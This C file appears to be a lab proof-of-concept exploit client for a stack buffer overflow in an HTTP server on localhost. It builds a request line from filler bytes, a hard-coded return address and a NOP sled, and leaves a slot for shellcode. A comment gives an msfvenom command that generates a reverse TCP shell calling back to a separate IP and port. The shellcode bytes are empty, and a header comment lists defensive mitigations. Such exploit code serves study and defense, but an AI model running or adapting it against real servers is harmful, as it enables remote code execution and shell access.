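/*
 * Proof-of-concept client for a stack buffer overflow in an HTTP server on
 * 127.0.0.1:8001 (the server code is not part of this file).
 *
 * Request layout, as built below:
 *
 *   "GET /" | 148 x 'a' | 4-byte address | 0x20 x 0x90 | payload | " HTTP/1.1..."
 *
 * NOTE(review): the layout suggests the server copies the request path into
 * a fixed-size stack buffer without a length check, so the 4-byte value lands
 * on a saved return address -- confirm against the server source.
 *
 * Defensive notes:
 *  - The real fix is a bounds check on the path length in the server.
 *  - A hard-coded stack address followed by inline code presumably relies on
 *    ASLR being disabled and the stack being executable; a stack protector,
 *    a non-executable stack and ASLR each break that assumption.
 *  - On the wire this is a request line with an over-long path containing
 *    non-printable bytes and a run of 0x90, which a WAF or IDS rule can match.
 *
 * The header names were lost when the page was extracted; the ones below are
 * the headers the calls in this file require.
 */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

enum {
    FILLER_LEN  = 148,   /* filler before the overwritten 4-byte value */
    SLED_LEN    = 0x20,  /* number of 0x90 bytes placed after it */
    TARGET_PORT = 8001
};

/*
 * Builds the request in a local buffer, sends it once, reads one reply and
 * exits.
 *
 * Returns 0 when the request was sent in full, 1 on any socket error or if
 * the request would not fit in the buffer.
 */
int main(void)
{
    static const char request_head[] = "GET /";
    static const char request_tail[] = " HTTP/1.1\r\nHost:localhost:8001\r\n\r\n";

    char junk[FILLER_LEN];
    memset(junk, 'a', sizeof junk);

    /* Written in host byte order; the original calls this "rip", but it is a
     * 32-bit value for an x86 target. */
    unsigned int ret_addr = 0xffffcc60;

    unsigned char nops[SLED_LEN];
    memset(nops, 0x90, sizeof nops);

    // msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.147.151 LPORT=9999 -b "\x00\x0a\x0d" -f c
    /* The payload bytes are empty on the page and are left empty here. */
    unsigned char scode[] = "";

    char buffer[2000];
    const size_t head_len = sizeof request_head - 1;
    const size_t tail_len = sizeof request_tail - 1;
    const size_t scode_len = sizeof scode - 1; /* drop the literal's NUL */
    const size_t total = head_len + sizeof junk + sizeof ret_addr
                       + sizeof nops + scode_len + tail_len;

    /* The original wrote into buffer with no size check at all. */
    if (total > sizeof buffer) {
        fprintf(stderr, "request (%zu bytes) does not fit in buffer\n", total);
        return 1;
    }

    size_t offset = 0;
    memcpy(buffer + offset, request_head, head_len);
    offset += head_len;
    memcpy(buffer + offset, junk, sizeof junk);
    offset += sizeof junk;
    memcpy(buffer + offset, &ret_addr, sizeof ret_addr);
    offset += sizeof ret_addr;
    memcpy(buffer + offset, nops, sizeof nops);
    offset += sizeof nops;
    memcpy(buffer + offset, scode, scode_len);
    offset += scode_len;
    memcpy(buffer + offset, request_tail, tail_len);
    offset += tail_len;

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    int rc = 1;
    char response[4096];

    /* Zero the whole struct so sin_zero is not left uninitialised. */
    struct sockaddr_in server = {0};
    server.sin_family = AF_INET;
    server.sin_port = htons(TARGET_PORT);
    server.sin_addr.s_addr = inet_addr("127.0.0.1");

    if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) {
        perror("connect");
        goto out;
    }

    ssize_t sent = send(sock, buffer, offset, 0);
    if (sent < 0) {
        perror("send");
        goto out;
    }
    if ((size_t)sent != offset) {
        fprintf(stderr, "short send: %zd of %zu bytes\n", sent, offset);
        goto out;
    }

    /* The reply is read once and discarded, as in the original. */
    (void)recv(sock, response, sizeof response, 0);
    rc = 0;

out:
    close(sock);
    return rc;
}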